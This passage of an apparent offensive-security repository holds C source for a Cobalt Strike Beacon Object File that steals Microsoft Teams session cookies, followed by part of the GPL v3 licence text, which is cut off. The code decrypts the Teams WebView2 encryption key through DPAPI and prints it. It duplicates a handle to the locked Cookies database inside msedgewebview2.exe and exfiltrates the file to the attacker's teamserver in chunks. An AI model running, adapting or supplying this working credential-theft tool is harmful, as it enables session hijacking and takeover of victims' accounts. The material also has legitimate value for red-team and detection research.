KERNEL32$HeapFree (HANDLE hHeap, DWORD dwFlags, LPVOID lpMem); 46 | WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap (VOID); 47 | WINBASEAPI LPVOID WINAPI KERNEL32$HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes); 48 | DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtQueryObject(HANDLE, OBJECT_INFORMATION_CLASS, PVOID, ULONG, PULONG); 49 | WINBASEAPI void __cdecl MSVCRT$free(void *_Memory); 50 | WINBASEAPI void* WINAPI MSVCRT$malloc(SIZE_T); 51 | WINBASEAPI DWORD WINAPI KERNEL32$GetModuleFileNameA (HMODULE, LPSTR, DWORD); 52 | WINBASEAPI DWORD WINAPI KERNEL32$GetCurrentProcessId (VOID); 53 | 54 | #define IMPORT_RESOLVE FARPROC SHGetFolderPath = Resolver("shell32", "SHGetFolderPathA"); \ 55 | FARPROC PathAppend = Resolver("shlwapi", "PathAppendA"); \ 56 | FARPROC srand = Resolver("msvcrt", "srand");\ 57 | FARPROC time = Resolver("msvcrt", "time");\ 58 | FARPROC strnlen = Resolver("msvcrt", "strnlen");\ 59 | FARPROC rand = Resolver("msvcrt", "rand");\ 60 | FARPROC realloc = Resolver("msvcrt", "realloc"); 61 | #define intAlloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size) 62 | #define intFree(addr) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, addr) 63 | #define DATA_FREE(d, l) \ 64 | if (d) { \ 65 | MSVCRT$memset(d, 0, l); \ 66 | intFree(d); \ 67 | d = NULL; \ 68 | } 69 | #define CSIDL_LOCAL_APPDATA 0x001c 70 | 71 | //workaround for no slot for function (reduce number of Win32 APIs called) 72 | FARPROC Resolver(CHAR *lib, CHAR *func) { 73 | FARPROC ptr = KERNEL32$GetProcAddress(KERNEL32$LoadLibraryA(lib), func); 74 | return ptr; 75 | } 76 | 77 | CHAR *GetFileContent(CHAR *path) { 78 | CHAR fullPath[MAX_PATH]; 79 | HANDLE hFile = NULL; 80 | IMPORT_RESOLVE; 81 | 82 | //get appdata local path and append path 83 | if (path[0] == '\\') { 84 | BeaconPrintf(CALLBACK_OUTPUT,"Appending local app data path\n"); 85 | CHAR appdata[MAX_PATH]; 86 | SHGetFolderPath(NULL, CSIDL_LOCAL_APPDATA, NULL, 0, appdata); 87 | PathAppend(appdata, path); 88 | MSVCRT$strncpy(fullPath, appdata, MAX_PATH); 89 | } else { 90 | MSVCRT$strncpy(fullPath, path, MAX_PATH); 91 | } 92 | BeaconPrintf(CALLBACK_OUTPUT, "LOOKING FOR FILE: %s \n", fullPath); 93 | 94 | //get handle to appdata 95 | hFile = KERNEL32$CreateFileA(fullPath, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 96 | if(hFile == INVALID_HANDLE_VALUE) { 97 | return NULL; 98 | } 99 | 100 | CHAR *buffer = NULL; 101 | DWORD dwSize = 0; 102 | DWORD dwRead = 0; 103 | 104 | //read cookie file and return as buffer var 105 | dwSize = KERNEL32$GetFileSize(hFile, NULL); 106 | buffer = (CHAR*)KERNEL32$GlobalAlloc(GPTR, dwSize + 1); 107 | KERNEL32$ReadFile(hFile, buffer, dwSize, &dwRead, NULL); 108 | 109 | if(dwSize != dwRead) { 110 | BeaconPrintf(CALLBACK_OUTPUT,"file size mismatch.\n"); 111 | } 112 | KERNEL32$CloseHandle(hFile); 113 | return buffer; 114 | } 115 | 116 | CHAR *ExtractPattern(CHAR *buffer, CHAR * pattern, CHAR * endChar) { 117 | //look for pattern with key 118 | //CHAR pattern[] = "\"encrypted_key\":\""; 119 | CHAR *start = MSVCRT$strstr(buffer, pattern); 120 | CHAR *end = NULL; 121 | CHAR *key = NULL; 122 | DWORD dwSize = 0; 123 | 124 | if(start == NULL) { 125 | return NULL; 126 | } 127 | //BeaconPrintf(CALLBACK_OUTPUT,"Encrpyted string start at 0x%p buffer start at 0x%p \n", start, buffer); 128 | 129 | // calc length of key 130 | start += MSVCRT$strlen(pattern); 131 | buffer = start; 132 | end = MSVCRT$strstr(buffer, endChar); // "\""); 133 | 134 | if(end == NULL) { 135 | return NULL; 136 | } 137 | dwSize = end - start; 138 | //BeaconPrintf(CALLBACK_OUTPUT,"Encrpyted data size is %d\n", dwSize); 139 | 140 | //extract key from file 141 | key = (CHAR*)KERNEL32$GlobalAlloc(GPTR, dwSize + 1); 142 | MSVCRT$strncpy(key, buffer, dwSize); 143 | return key; 144 | } 145 | 146 | VOID GetMasterKey(CHAR *key) { 147 | BYTE *byteKey = NULL; 148 | DWORD dwOut = 0; 149 | IMPORT_RESOLVE; 150 | 151 | //calculate size of key 152 | CRYPT32$CryptStringToBinaryA(key, MSVCRT$strlen(key), CRYPT_STRING_BASE64, NULL, &dwOut, NULL, NULL); 153 | //BeaconPrintf(CALLBACK_OUTPUT,"base64 size needed is %d.\n", dwOut); 154 | 155 | //base64 decode key 156 | byteKey = (CHAR*)KERNEL32$GlobalAlloc(GPTR, dwOut); 157 | CRYPT32$CryptStringToBinaryA(key, MSVCRT$strlen(key), CRYPT_STRING_BASE64, byteKey, &dwOut, NULL, NULL); 158 | byteKey += 5; 159 | 160 | DATA_BLOB db; 161 | DATA_BLOB final; 162 | db.pbData = byteKey; 163 | db.cbData = dwOut; 164 | 165 | //decrypt key with dpapi for current user 166 | BOOL result = CRYPT32$CryptUnprotectData(&db, NULL, NULL, NULL, NULL, 0, &final); 167 | if(!result) { 168 | BeaconPrintf(CALLBACK_ERROR,"Decrypting the key failed.\n"); 169 | return; 170 | } 171 | //BeaconPrintf(CALLBACK_OUTPUT, "Decrypted Key!"); 172 | 173 | // return decrypted key 174 | CHAR *output = (CHAR*)KERNEL32$GlobalAlloc(GPTR, (final.cbData * 4) + 1); 175 | DWORD i = 0; 176 | for(i = 0; i < final.cbData; i++) { 177 | MSVCRT$sprintf(output, "%s\\x%02x", output, final.pbData[i]); 178 | } 179 | BeaconPrintf(CALLBACK_OUTPUT, "Decrypt Key: %s \n", output ); 180 | 181 | // rewind to the start of the buffer 182 | KERNEL32$GlobalFree(byteKey - 5); 183 | KERNEL32$GlobalFree(output); 184 | KERNEL32$LocalFree(final.pbData); 185 | } 186 | 187 | VOID GetEncryptionKey() { 188 | char * browserProcess = ""; 189 | char localStatePath[MAX_PATH] = ""; 190 | const char * localStatePathStart = "\\Packages\\MSTeams_"; 191 | const char * localStatePathEnd = "\\LocalCache\\Microsoft\\MSTeams\\EBWebView\\Local State"; 192 | // find package version 193 | char path[MAX_PATH]; 194 | DWORD result; 195 | result = KERNEL32$GetModuleFileNameA(NULL, path, MAX_PATH); 196 | if (result == 0) { 197 | BeaconPrintf(CALLBACK_ERROR, "Error getting module file name.\n"); 198 | return; 199 | } 200 | CHAR patternVersion[] = "x64__"; 201 | CHAR endCharVersion[] = "\\"; 202 | char * teams_version = ExtractPattern(path, patternVersion, endCharVersion); 203 | MSVCRT$strncat(localStatePath, localStatePathStart, MSVCRT$strlen(localStatePathStart)); 204 | MSVCRT$strncat(localStatePath, teams_version, MSVCRT$strlen(teams_version)); 205 | MSVCRT$strncat(localStatePath, localStatePathEnd, MSVCRT$strlen(localStatePathEnd)); 206 | BeaconPrintf(CALLBACK_OUTPUT, "localStatePath: %s", localStatePath); 207 | 208 | browserProcess = "msedgewebview2.exe"; 209 | 210 | CHAR *data = GetFileContent(localStatePath); 211 | CHAR *key = NULL; 212 | 213 | if(data == NULL) { 214 | BeaconPrintf(CALLBACK_ERROR,"Reading the file failed.\n"); 215 | return; 216 | } 217 | BeaconPrintf(CALLBACK_OUTPUT, "Got Local State File"); 218 | CHAR pattern[] = "\"encrypted_key\":\""; 219 | CHAR endChar[] = "\""; 220 | key = ExtractPattern(data, pattern, endChar); 221 | KERNEL32$GlobalFree(data); 222 | if(key == NULL) { 223 | BeaconPrintf(CALLBACK_ERROR, "getting the key failed.\n"); 224 | return; 225 | } 226 | GetMasterKey(key); 227 | } 228 | 229 | VOID GetBrowserData() { 230 | //get handle to all processes 231 | HANDLE hSnap = KERNEL32$CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 232 | PROCESSENTRY32 pe32; 233 | BOOL databaseStatus = FALSE; 234 | pe32.dwSize = sizeof(PROCESSENTRY32); 235 | DWORD currentProcessId = KERNEL32$GetCurrentProcessId(); 236 | // BeaconPrintf(CALLBACK_OUTPUT, "currentProcessId: %lu\n", currentProcessId); 237 | DWORD webviewProcessesIds[100]; 238 | DWORD webviewProcessesParentIds[100]; 239 | int countWebviewProcess = 0; 240 | DWORD firstWebviewProcess = 0; 241 | char * browserProcess = "msedgewebview2.exe"; 242 | int peId; 243 | int peParentId; 244 | 245 | // iterate through each handle to find msedgewebview2 processes 246 | // Teams has 1 msedgewebview2 process, which itself has several 247 | BeaconPrintf(CALLBACK_OUTPUT, "Looking for Cookies\n"); 248 | if(KERNEL32$Process32First(hSnap, &pe32)) { 249 | do { 250 | // BeaconPrintf(CALLBACK_OUTPUT, "Process: %s\n", pe32.szExeFile); 251 | if(MSVCRT$strcmp(pe32.szExeFile, browserProcess) == 0) 252 | { 253 | 254 | // BeaconPrintf(CALLBACK_OUTPUT, "msedgewebview2 process id: %lu\n", pe32.th32ProcessID); 255 | // BeaconPrintf(CALLBACK_OUTPUT, "msedgewebview2 parent process id: %lu\n", pe32.th32ParentProcessID); 256 | // first msedgewebview2 was found, try get cookies database 257 | if(pe32.th32ParentProcessID == currentProcessId){ 258 | firstWebviewProcess = pe32.th32ProcessID; 259 | if (GetBrowserFile(pe32.th32ProcessID, "Network\\Cookies")){ 260 | databaseStatus = TRUE; 261 | break; 262 | } 263 | }else{ 264 | webviewProcessesIds[countWebviewProcess] = pe32.th32ProcessID; 265 | webviewProcessesParentIds[countWebviewProcess] = pe32.th32ParentProcessID; 266 | countWebviewProcess++; 267 | } 268 | } 269 | } while(KERNEL32$Process32Next(hSnap, &pe32)); 270 | if(!databaseStatus){ 271 | for(size_t i = 0; i < countWebviewProcess; i++){ 272 | peId = webviewProcessesIds[i]; 273 | peParentId = webviewProcessesParentIds[i]; 274 | if(peParentId == firstWebviewProcess){ // check the process is child of the main msedgewebview2 275 | if (GetBrowserFile(peId, "Network\\Cookies")){ 276 | databaseStatus = TRUE; 277 | break; 278 | } 279 | } 280 | } 281 | } 282 | if (databaseStatus == FALSE){ 283 | BeaconPrintf(CALLBACK_ERROR,"NO HANDLE TO COOKIES WAS FOUND \n"); 284 | } 285 | } 286 | KERNEL32$CloseHandle(hSnap); 287 | } 288 | 289 | BOOL GetBrowserFile(DWORD PID, CHAR *browserFile) { 290 | IMPORT_RESOLVE; 291 | 292 | // BeaconPrintf(CALLBACK_OUTPUT, "Browser PID found %d\n", PID); 293 | // BeaconPrintf(CALLBACK_OUTPUT,"Searching for handle to %s \n", browserFile); 294 | 295 | SYSTEM_HANDLE_INFORMATION_EX *shi = NULL; 296 | DWORD dwNeeded = 0; 297 | DWORD dwSize = 0xffffff / 2; 298 | shi = (SYSTEM_HANDLE_INFORMATION_EX *)KERNEL32$GlobalAlloc(GPTR, dwSize); 299 | 300 | // differentiate file names based on PID (if multiple processes found to have an handle to Network\\Cookies) 301 | CHAR * downloadFileName = "TeamzCookeez.db"; 302 | 303 | //utilize NtQueryStemInformation to list all handles on system 304 | NTSTATUS status = NTDLL$NtQuerySystemInformation(SystemHandleInformationEx, shi, dwSize, &dwNeeded); 305 | if(status == STATUS_INFO_LENGTH_MISMATCH) 306 | { 307 | dwSize = dwNeeded; 308 | shi = (SYSTEM_HANDLE_INFORMATION_EX*)KERNEL32$GlobalReAlloc(shi, dwSize, GMEM_MOVEABLE); 309 | if (dwSize == NULL) 310 | { 311 | BeaconPrintf(CALLBACK_ERROR, "Failed to reallocate memory for handle information.\n"); 312 | KERNEL32$GlobalFree(shi); 313 | return FALSE; 314 | } 315 | } 316 | status = NTDLL$NtQuerySystemInformation(SystemHandleInformationEx, shi, dwSize, &dwNeeded); 317 | if(status != 0) 318 | { 319 | BeaconPrintf(CALLBACK_ERROR,"NtQuerySystemInformation failed with status 0x%x for PID: %d.\n", status, PID); 320 | KERNEL32$GlobalFree(shi); 321 | return FALSE; 322 | } 323 | //BeaconPrintf(CALLBACK_OUTPUT,"Handle Count %d\n", shi->NumberOfHandles); 324 | DWORD i = 0; 325 | BOOL firstHandle = TRUE; 326 | //iterate through each handle and find our PID and a handle to a file 327 | for(i = 0; i < shi->NumberOfHandles; i++) { 328 | SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX handle = shi->Handles[i]; 329 | if((DWORD)(ULONG_PTR)handle.UniqueProcessId == PID) { 330 | // BeaconPrintf(CALLBACK_OUTPUT, "Found PID"); 331 | POBJECT_NAME_INFORMATION objectNameInfo = (POBJECT_NAME_INFORMATION)MSVCRT$malloc(0x1000); 332 | ULONG returnLength = 0; 333 | NTSTATUS ret = 0; 334 | if(handle.GrantedAccess != 0x001a019f || ( handle.HandleAttributes != 0x2 && handle.GrantedAccess == 0x0012019f)) { 335 | HANDLE hProc = KERNEL32$OpenProcess(PROCESS_DUP_HANDLE, FALSE, PID); 336 | if(hProc == INVALID_HANDLE_VALUE) { 337 | BeaconPrintf(CALLBACK_ERROR,"OpenProcess failed %d\n", KERNEL32$GetLastError()); 338 | KERNEL32$GlobalFree(shi); 339 | MSVCRT$free(objectNameInfo); 340 | return FALSE; 341 | } 342 | 343 | HANDLE hDuplicate = NULL; 344 | if(!KERNEL32$DuplicateHandle(hProc, (HANDLE)(intptr_t)handle.HandleValue, (HANDLE) -1, &hDuplicate, 0, FALSE, DUPLICATE_SAME_ACCESS)) { 345 | //BeaconPrintf(CALLBACK_ERROR,"DuplicateHandle failed %d\n", KERNEL32$GetLastError()); 346 | continue; 347 | } 348 | //Check if the handle exists on disk, otherwise the program will hang 349 | DWORD fileType = KERNEL32$GetFileType(hDuplicate); 350 | if (fileType != FILE_TYPE_DISK) { 351 | //BeaconPrintf(CALLBACK_ERROR, "NOT A FILE"); 352 | continue; 353 | } 354 | //BeaconPrintf(CALLBACK_OUTPUT,"Duplicated Handle, confirmed file on disk"); 355 | ret = NTDLL$NtQueryObject(hDuplicate,ObjectNameInformation, objectNameInfo, 0x1000, &returnLength); 356 | 357 | if (ret != 0) 358 | { 359 | BeaconPrintf(CALLBACK_ERROR,"Failed NtQueryObject"); 360 | KERNEL32$GlobalFree(shi); 361 | MSVCRT$free(objectNameInfo); 362 | return FALSE; 363 | } 364 | if (ret == 0 && objectNameInfo->Name.Length > 0){ 365 | char handleName[1024]; 366 | MSVCRT$sprintf(handleName, "%.*ws", objectNameInfo->Name.Length / sizeof(WCHAR), objectNameInfo->Name.Buffer); 367 | 368 | PPUBLIC_OBJECT_TYPE_INFORMATION objectTypeInfo = (PPUBLIC_OBJECT_TYPE_INFORMATION)MSVCRT$malloc(0x1000); 369 | ret = NTDLL$NtQueryObject(hDuplicate,ObjectTypeInformation, objectTypeInfo, 0x1000, &returnLength); 370 | if (ret != 0) 371 | { 372 | BeaconPrintf(CALLBACK_ERROR,"Failed NtQueryObject"); 373 | KERNEL32$GlobalFree(shi); 374 | MSVCRT$free(objectTypeInfo); 375 | MSVCRT$free(objectNameInfo); 376 | return FALSE; 377 | } 378 | if (ret == 0 && (MSVCRT$strcmp(objectTypeInfo,"File"))){ 379 | // BeaconPrintf(CALLBACK_OUTPUT, "%s\n", handleName); 380 | // BeaconPrintf(CALLBACK_OUTPUT, "%d\n", MSVCRT$strlen(handleName)); 381 | if (MSVCRT$strstr(handleName, browserFile) != NULL && (MSVCRT$strcmp(&handleName[MSVCRT$strlen(handleName) - 4], "Data") == 0 || MSVCRT$strcmp(&handleName[MSVCRT$strlen(handleName) - 7], "Cookies") == 0)){ 382 | 383 | // BeaconPrintf(CALLBACK_OUTPUT,"Handle to %s Was FOUND with PID: %lu\n", browserFile, PID); 384 | // BeaconPrintf(CALLBACK_OUTPUT, "Handle Name: %.*ws\n", objectNameInfo->Name.Length / sizeof(WCHAR), objectNameInfo->Name.Buffer); 385 | 386 | KERNEL32$SetFilePointer(hDuplicate, 0, 0, FILE_BEGIN); 387 | DWORD dwFileSize = KERNEL32$GetFileSize(hDuplicate, NULL); 388 | // BeaconPrintf(CALLBACK_OUTPUT,"file size is %d\n", dwFileSize); 389 | DWORD dwRead = 0; 390 | CHAR *buffer = (CHAR*)KERNEL32$GlobalAlloc(GPTR, dwFileSize); 391 | KERNEL32$ReadFile(hDuplicate, buffer, dwFileSize, &dwRead, NULL); 392 | download_file(downloadFileName, buffer, dwFileSize); 393 | 394 | KERNEL32$GlobalFree(buffer); 395 | KERNEL32$GlobalFree(shi); 396 | MSVCRT$free(objectTypeInfo); 397 | MSVCRT$free(objectNameInfo); 398 | return TRUE; 399 | } 400 | 401 | }else{ 402 | KERNEL32$CloseHandle(hDuplicate); 403 | MSVCRT$free(objectTypeInfo); 404 | MSVCRT$free(objectNameInfo); 405 | } 406 | } 407 | } 408 | } 409 | } 410 | return FALSE; 411 | } 412 | 413 | // nanodump fileless download 414 | BOOL download_file( IN LPCSTR fileName, IN char fileData[], IN ULONG32 fileLength) 415 | { 416 | IMPORT_RESOLVE; 417 | int fileNameLength = strnlen(fileName, 256); 418 | 419 | // intializes the random number generator 420 | time_t t; 421 | srand((unsigned) time(&t)); 422 | 423 | // generate a 4 byte random id, rand max value is 0x7fff 424 | ULONG32 fileId = 0; 425 | fileId |= (rand() & 0x7FFF) << 0x11; 426 | fileId |= (rand() & 0x7FFF) << 0x02; 427 | fileId |= (rand() & 0x0003) << 0x00; 428 | 429 | // 8 bytes for fileId and fileLength 430 | int messageLength = 8 + fileNameLength; 431 | char* packedData = intAlloc(messageLength); 432 | if (!packedData) 433 | { 434 | BeaconPrintf(CALLBACK_ERROR, "Could not allocate memory for the file. Last Error %d", KERNEL32$GetLastError()); 435 | return FALSE; 436 | } 437 | 438 | // pack on fileId as 4-byte int first 439 | packedData[0] = (fileId >> 0x18) & 0xFF; 440 | packedData[1] = (fileId >> 0x10) & 0xFF; 441 | packedData[2] = (fileId >> 0x08) & 0xFF; 442 | packedData[3] = (fileId >> 0x00) & 0xFF; 443 | 444 | // pack on fileLength as 4-byte int second 445 | packedData[4] = (fileLength >> 0x18) & 0xFF; 446 | packedData[5] = (fileLength >> 0x10) & 0xFF; 447 | packedData[6] = (fileLength >> 0x08) & 0xFF; 448 | packedData[7] = (fileLength >> 0x00) & 0xFF; 449 | 450 | // pack on the file name last 451 | for (int i = 0; i < fileNameLength; i++) 452 | { 453 | packedData[8 + i] = fileName[i]; 454 | } 455 | 456 | // tell the teamserver that we want to download a file 457 | BeaconOutput(CALLBACK_FILE,packedData,messageLength); 458 | DATA_FREE(packedData, messageLength); 459 | 460 | // we use the same memory region for all chucks 461 | int chunkLength = 4 + CHUNK_SIZE; 462 | char* packedChunk = intAlloc(chunkLength); 463 | if (!packedChunk) 464 | { 465 | BeaconPrintf(CALLBACK_ERROR, "Could not allocate memory for the file. Last Error %d", KERNEL32$GetLastError()); 466 | return FALSE; 467 | } 468 | // the fileId is the same for all chunks 469 | packedChunk[0] = (fileId >> 0x18) & 0xFF; 470 | packedChunk[1] = (fileId >> 0x10) & 0xFF; 471 | packedChunk[2] = (fileId >> 0x08) & 0xFF; 472 | packedChunk[3] = (fileId >> 0x00) & 0xFF; 473 | 474 | ULONG32 exfiltrated = 0; 475 | while (exfiltrated < fileLength) 476 | { 477 | // send the file content by chunks 478 | chunkLength = fileLength - exfiltrated > CHUNK_SIZE ? CHUNK_SIZE : fileLength - exfiltrated; 479 | ULONG32 chunkIndex = 4; 480 | for (ULONG32 i = exfiltrated; i < exfiltrated + chunkLength; i++) 481 | { 482 | packedChunk[chunkIndex++] = fileData[i]; 483 | } 484 | // send a chunk 485 | BeaconOutput( 486 | CALLBACK_FILE_WRITE, 487 | packedChunk, 488 | 4 + chunkLength); 489 | exfiltrated += chunkLength; 490 | } 491 | DATA_FREE(packedChunk, chunkLength); 492 | 493 | // tell the teamserver that we are done writing to this fileId 494 | char packedClose[4]; 495 | packedClose[0] = (fileId >> 0x18) & 0xFF; 496 | packedClose[1] = (fileId >> 0x10) & 0xFF; 497 | packedClose[2] = (fileId >> 0x08) & 0xFF; 498 | packedClose[3] = (fileId >> 0x00) & 0xFF; 499 | BeaconOutput( 500 | CALLBACK_FILE_CLOSE, 501 | packedClose, 502 | 4); 503 | BeaconPrintf(CALLBACK_OUTPUT,"The file was downloaded filessly"); 504 | return TRUE; 505 | } 506 | 507 | VOID go(char *buf, int len) { 508 | GetEncryptionKey(); 509 | GetBrowserData(); 510 | } 511 | 512 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. We, the Free Software Foundation, use the 18 | GNU General Public License for most of our software; it applies also to 19 | any other work released this way by its authors. You can apply it to 20 | your programs, too. 21 | 22 | When we speak of free software, we are referring to freedom, not 23 | price. Our General Public Licenses are designed to make sure that you 24 | have the freedom to distribute copies of free software (and charge for 25 | them if you wish), that you receive source code or can get it if you 26 | want it, that you can change the software or use pieces of it in new 27 | free programs, and that you know you can do these things. 28 | 29 | To protect your rights, we need to prevent others from denying you 30 | these rights or asking you to surrender the rights. Therefore, you have 31 | certain responsibilities if you distribute copies of the software, or if 32 | you modify it: responsibilities to respect the freedom of others. 33 | 34 | For example, if you distribute copies of such a program, whether 35 | gratis or for a fee, you must pass on to the recipients the same 36 | freedoms that you received. You must make sure that they, too, receive 37 | or can get the source code. And you must show them these terms so they 38 | know their rights. 39 | 40 | Developers that use the GNU GPL protect your rights with two steps: 41 | (1) assert copyright on the software, and (2) offer you this License 42 | giving you legal permission to copy, distribute and/or modify it. 43 | 44 | For the developers' and authors' protection, the GPL clearly explains 45 | that there is no warranty for this free software. For both users' and 46 | authors' sake, the GPL requires that modified versions be marked as 47 | changed, so that their problems will not be attributed erroneously to 48 | authors of previous versions. 49 | 50 | Some devices are designed to deny users access to install or run 51 | modified versions of the software inside them, although the manufacturer 52 | can do so. This is fundamentally incompatible with the aim of 53 | protecting users' freedom to change the software. The systematic 54 | pattern of such abuse occurs in the area of products for individuals to 55 | use, which is precisely where it is most unacceptable. Therefore, we 56 | have designed this version of the GPL to prohibit the practice for those 57 | products. If such problems arise substantially in other domains, we 58 | stand ready to extend this provision to those domains in future versions 59 | of the GPL, as needed to protect the freedom of users. 60 | 61 | Finally, every program is threatened constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), 